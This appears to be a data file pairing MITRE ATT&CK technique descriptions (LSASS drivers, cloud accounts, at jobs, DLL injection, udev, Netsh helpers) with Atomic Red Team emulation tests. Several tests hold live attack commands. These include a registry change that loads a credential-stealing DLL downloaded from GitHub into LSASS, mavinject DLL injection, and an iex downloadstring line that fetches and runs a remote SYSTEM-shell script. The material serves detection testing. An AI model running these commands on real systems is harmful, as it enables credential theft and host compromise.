Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vincent Le Toux
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1547.008
atomic_tests:
- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
auto_generated_guid: 8ecef16d-d289-46b4-917b-0dba6dc81cf1
description: "The following Atomic will modify an undocumented registry key
that may be abused to load a arbitrary DLL into LSASS. \n\nUpon execution,
the registry key will be modified and a value will contain the path to the
DLL. \nReference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source
https://github.com/oxfemale/LogonCredentialsSteal\nNote that if any LSA based
protection is enabled, this will most likely not be successful with LSASS.exe
loading the DLL.\n"
supported_platforms:
- windows
input_arguments:
dll_path:
description: Module to be loaded into LSASS
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\lsass_lib.dll
dependency_executor_name: powershell
dependencies:
- description: 'lsass_lib.dll must exist on disk at specified location (#{dll_path})
'
prereq_command: 'if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/53e74251f397ddeab2bd1348c3ff26d702cfd836/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}"
executor:
command: 'New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS
-Name LsaDbExtPt -Value "#{dll_path}"
'
cleanup_command: 'Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS"
-Name "LsaDbExtPt" -ErrorAction Ignore | Out-Null
'
name: powershell
elevation_required: true
T1078.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
created: '2020-03-13T20:36:57.378Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/004
external_id: T1078.004
- source_name: AWS Identity Federation
description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13,
2020.
url: https://aws.amazon.com/identity/federation/
- source_name: SpecterOps Managed Identity 2022
description: 'Andy Robbins. (2022, June 6). Managed Identity Attack Paths,
Part 1: Automation Accounts. Retrieved March 18, 2025.'
url: https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c
- source_name: Google Federating GC
description: Google. (n.d.). Federating Google Cloud with Active Directory.
Retrieved March 13, 2020.
url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction
- source_name: Microsoft Deploying AD Federation
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.682Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
or Defense Evasion. Cloud accounts are those created and configured by an
organization for use by users, remote support, services, or for administration
of resources within a cloud service provider or SaaS application. Cloud Accounts
can exist solely in the cloud; alternatively, they may be hybrid-joined between
on-premises systems and the cloud through syncing or federation with other
identity sources such as Windows Active Directory.(Citation: AWS Identity
Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying
AD Federation)\n\nService or user accounts may be targeted by adversaries
through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566),
or various other means to gain access to the environment. Federated or synced
accounts may be a pathway for the adversary to affect both on-premises systems
and cloud environments - for example, by leveraging shared credentials to
log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High
privileged cloud accounts, whether federated, synced, or cloud-only, may also
allow pivoting to on-premises environments by leveraging SaaS-based [Software
Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands
on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised
cloud account to maintain persistence in the environment. Such credentials
may also be used to bypass security controls such as multi-factor authentication.
\n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)
or other privileges through various means within the environment. Misconfigurations
in role assignments or role assumption policies may allow an adversary to
use these mechanisms to leverage permissions outside the intended scope of
the account. Such over privileged accounts may be used to harvest sensitive
data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009)
or other methods. For example, in Azure environments, adversaries may target
Azure Managed Identities, which allow associated Azure resources to request
access tokens. By compromising a resource with an attached Managed Identity,
such as an Azure VM, adversaries may be able to [Steal Application Access
Token](https://attack.mitre.org/techniques/T1528)s to move laterally across
the cloud environment.(Citation: SpecterOps Managed Identity 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Arun Seelagan, CISA
- Eliraz Levi, Hunters Security
- Alon Klayman, Hunters Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
- Office Suite
- SaaS
x_mitre_version: '1.9'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
auto_generated_guid: 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
'
supported_platforms:
- google-workspace
- iaas:gcp
input_arguments:
project-id:
description: ID of the project, you want to create service account as well
as service account key for
type: string
default: art-project-1
service-account-name:
description: Name of the service account
type: string
default: gcp-art-service-account-1
service-account-email:
description: Email of the service account
type: string
default: gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com
output-key-file:
description: Email of the service account
type: string
default: gcp-art-service-account-1.json
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project-id}
gcloud iam service-accounts create #{service-account-name}
gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
'
dependency_executor_name: sh
dependencies:
- description: 'Requires gcloud
'
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
'
- description: "Check if user is logged in \n"
prereq_command: 'gcloud config get-value account
'
get_prereq_command: 'gcloud auth login --no-launch-browser
'
- name: Azure Persistence Automation Runbook Created or Modified
auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
description: |
Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
Automation runbook to execute malicious code and maintain persistence in their target's environment.
supported_platforms:
- iaas:azure
input_arguments:
resource_group:
description: Name of the resource group
type: string
default: ART-ResourceGroupName-T1078-004
runbook_name:
description: Name of the runbook name
type: string
default: ART-RunbookName-T1078-004
automation_account_name:
description: Name of the automation account name
type: string
default: ART-AutomationAccountName-T1078-004
dependency_executor_name: powershell
dependencies:
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo "Please install terraform via https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli
(URL accurate as of Nov. 15, 2024)."
'
- description: |
Check if Azure CLI and Azure Powershell are installed.
* Login to Azure CLI with "az login", and login to Azure Powershell with "Connect-AzAccount". Sessions are not shared.
* Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI.
prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest
-Uri https://aka.ms/installazurecliwindowsx64 -OutFile .\\AzureCLI.msi;
Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet';
Remove-Item .\\AzureCLI.msi\n"
- description: 'Check if the user is logged into Azure.
'
prereq_command: 'try {if (-not (Get-AzContext)) { exit 1 } else { exit 0 }}
catch {exit 1}
'
get_prereq_command: 'echo "* Configure your Azure account using: Connect-AzAccount"
'
- description: |
Create dependency resources using terraform
* If fail to meet prereq, navigate to T1078.004-2 using "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
* Open the "terraform.tfvars" file and fill in the variables with your desired values.
* Re-run -GetPrereqs
prereq_command: 'try {if (Test-Path "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate"
){ exit 0 } else {exit 1}} catch {exit 1}
'
get_prereq_command: |
echo "Navigating to: $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
terraform init
terraform apply -auto-approve
executor:
command: 'New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName
#{resource_group} -Description ''my-test-runbook'' -AutomationAccountName
#{automation_account_name}
'
name: powershell
elevation_required: false
cleanup_command: |
Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
Remove-AzAutomationAccount -ResourceGroupName #{resource_group} -Name #{automation_account_name} -Force
Remove-AzResourceGroup -Name #{resource_group} -Force
echo "Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted."
cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
terraform destroy -auto-approve
- name: GCP - Create Custom IAM Role
auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
description: "This atomic will create a new IAM role. The default role permissions
are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
published by the Elastic team.\n\nIdentifies an Identity and Access Management
(IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
are user-defined, and allow for the bundling of one or more supported permissions
to meet specific needs. \nCustom roles will not be updated automatically and
could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
will create a new IAM role. The default role permissions are: *IAM Service
Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
supported_platforms:
- iaas:gcp
input_arguments:
project-id:
description: ID of the GCP Project you to execute the command against.
type: string
default: atomic-test-1
role-name:
description: The name of the role to be created.
type: string
default: AtomicRedTeamRole
role-description:
description: The description of the role to be created.
type: string
default: Atomic Red Team Custom IAM Role
roles:
description: List of roles to be applied
type: string
default: iam.serviceAccounts.get
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project-id}
gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
'
dependency_executor_name: sh
dependencies:
- description: 'Requires gcloud
'
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
'
- description: "Check if user is logged in \n"
prereq_command: 'gcloud config get-value account
'
get_prereq_command: 'gcloud auth login --no-launch-browser
'
T1053.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0
created: '2019-11-27T13:52:45.853Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/002
external_id: T1053.002
- source_name: rowland linux at 2019
description: Craig Rowland. (2019, July 25). Getting an Attacker IP Address
from a Malicious Linux At Job. Retrieved October 15, 2021.
url: https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/
- source_name: GTFObins at
description: Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved
September 28, 2021.
url: https://gtfobins.github.io/gtfobins/at/
- source_name: Linux at
description: IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved
February 25, 2022.
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
September 12, 2024.
url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
- source_name: TechNet Scheduled Task Events
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
- source_name: Malicious Life by Cybereason
description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: TechNet Forum Scheduled Task Operational Setting
description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention
settings. Retrieved December 12, 2017.
url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:36.495Z'
name: 'Scheduled Task/Job: At'
description: |-
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
x_mitre_version: '2.4'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
description: |
Executes cmd.exe
Note: deprecated in Windows 8+
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: 'at 13:20 /interactive cmd
'
- name: At - Schedule a job
auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e
description: 'This test submits a command to be run in the future by the `at`
daemon.
'
supported_platforms:
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
'
prereq_command: 'if [ "$(uname)" = ''FreeBSD'' ]; then which at; else which
at && which atd; fi;
'
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
'
- description: 'The `atd` daemon must be running
'
prereq_command: 'if [ $(uname) = ''Linux'' ]; then systemctl status atd ||
service atd status; fi;
'
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
'
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
- name: At - Schedule a job via kubectl in a Pod
auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
description: |
Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
and submits a job with `at`. The pod is deleted after execution.
supported_platforms:
- containers
input_arguments:
image_name:
description: Name of the image
type: string
default: ubuntu
pod_name:
description: K8s pod name to execute the command in
type: string
default: atomic-at-schedule
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependencies:
- description: kubectl must be installed and configured
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
name: bash
elevation_required: false
command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
--rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
-y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
| at #{time_spec} && at -l"
'
T1055.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
created: '2020-01-14T01:26:08.145Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/001
external_id: T1055.001
- source_name: Hiding Malicious Code with Module Stomping
description: 'Aliz Hammond. (2019, August 15). Hiding Malicious Code with
"Module Stomping": Part 1. Retrieved July 14, 2022.'
url: https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/
- source_name: Elastic HuntingNMemory June 2017
description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
7, 2017.
url: https://www.endgame.com/blog/technical-blog/hunting-memory
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Module Stomping for Shellcode Injection
description: Red Teaming Experiments. (n.d.). Module Stomping for Shellcode
Injection. Retrieved July 14, 2022.
url: https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:36.680Z'
name: 'Process Injection: Dynamic-link Library Injection'
description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
DLL injection is a method of executing arbitrary code in the address space
of a separate live process. \n\nDLL injection is commonly performed by writing
the path to a DLL in the virtual address space of the target process before
loading the DLL by invoking a new thread. The write can be performed with
native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
then invoked with CreateRemoteThread (which calls the LoadLibrary
API responsible for loading the DLL). (Citation: Elastic Process Injection
July 2017) \n\nVariations of this method such as reflective DLL injection
(writing a self-mapping DLL into a process) and memory module (map DLL when
writing into process) overcome the address relocation issue as well as the
additional APIs to invoke execution (since these methods load and execute
the files in memory by manually preforming the function of LoadLibrary).(Citation:
Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July
2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading
or DLL Hollowing, may be leveraged to conceal injected code within a process.
This method involves loading a legitimate DLL into a remote process then manually
overwriting the module's AddressOfEntryPoint before starting
a new thread in the target process.(Citation: Module Stomping for Shellcode
Injection) This variation allows attackers to hide malicious injected code
by potentially backing its execution with a legitimate DLL file on disk.(Citation:
Hiding Malicious Code with Module Stomping) \n\nRunning code in the context
of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via DLL injection may
also evade detection from security products since the execution is masked
under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Boominathan Sundaram
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1055.001
atomic_tests:
- name: Process Injection via mavinject.exe
auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
description: |
Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
supported_platforms:
- windows
input_arguments:
process_id:
description: PID of input_arguments
type: string
default: "(Start-Process notepad -PassThru).id"
dll_payload:
description: DLL to Inject
type: path
default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
dependency_executor_name: powershell
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
executor:
command: |
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Process -processname notepad
name: powershell
elevation_required: true
- name: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load
technique
auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
description: Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
name: powershell
T1546.017:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
created: '2024-09-26T17:02:09.888Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/017
external_id: T1546.017
- source_name: Ignacio Udev research 2024
description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
persistence. Retrieved September 26, 2024.
url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
- source_name: Elastic Linux Persistence 2024
description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
- A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
- source_name: Reichert aon sedexp 2024
description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:37.034Z'
name: Udev Rules
description: |-
Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Eduardo González Hernández (@codexlynx)
- Eder Pérez Ignacio, @ch4ik0
- Wirapong Petshagun
- "@grahamhelton3"
- Ruben Groenewoud (@RFGroenewoud)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.0'
atomic_tests: []
T1546.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed
created: '2020-01-24T14:26:51.207Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/007
external_id: T1546.007
- source_name: Demaske Netsh Persistence
description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL
DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.
url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
- source_name: TechNet Netsh
description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.
url: https://technet.microsoft.com/library/bb490939.aspx
- source_name: Github Netsh Helper CS Beacon
description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved
February 13, 2017.
url: https://github.com/outflankbv/NetshHelperBeacon
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:37.405Z'
name: 'Event Triggered Execution: Netsh Helper DLL'
description: |-
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matthew Demaske, Adaptforward
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1546.007
atomic_tests:
